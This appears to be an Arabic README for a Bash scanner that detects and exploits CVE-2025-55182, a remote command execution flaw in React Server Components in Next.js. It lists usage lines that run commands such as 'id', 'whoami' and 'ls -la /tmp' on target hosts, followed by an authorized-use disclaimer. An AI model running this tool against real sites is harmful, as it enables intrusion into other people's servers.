
ماسح ضوئي قائم على Bash لاكتشاف واستغلال CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React) في تطبيقات Next.js. يدعم تنفيذ الأوامر المخصصة ومسح عناوين URL.
أداة سطر أوامر بسيطة لاكتشاف واستغلال CVE-2025-55182 (تنفيذ الأكواد عن بُعد في مكونات خادم React) في تطبيقات Next.js.

chmod +x scanner.sh
# فحص باستخدام الأمر الافتراضي (id)
./scanner.sh -d example.com
# تنفيذ أمر مخصص
./scanner.sh -d example.com -c "whoami"
# باستخدام رابط كامل
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - النطاق/الرابط المستهدف (مطلوب)-c, --command - الأمر المراد تنفيذه (الافتراضي: id)# التحقق مما إذا كان الهدف ضعيفًا
./scanner.sh -d vulnerable-app.com
# الحصول على معلومات النظام
./scanner.sh -d vulnerable-app.com -c "uname -a"
# عرض الملفات
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
هذه الأداة لأغراض التعليم واختبار الأمان المصرح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك الإذن باختبارها.